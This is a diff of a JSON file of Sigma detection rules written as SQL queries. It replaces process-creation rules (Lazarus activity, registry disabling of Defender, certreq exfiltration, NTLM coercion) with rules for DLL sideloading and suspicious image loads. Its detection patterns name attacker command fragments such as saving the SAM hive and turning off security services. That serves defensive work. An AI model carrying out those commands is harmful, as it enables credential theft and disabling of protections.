"title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", - "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName 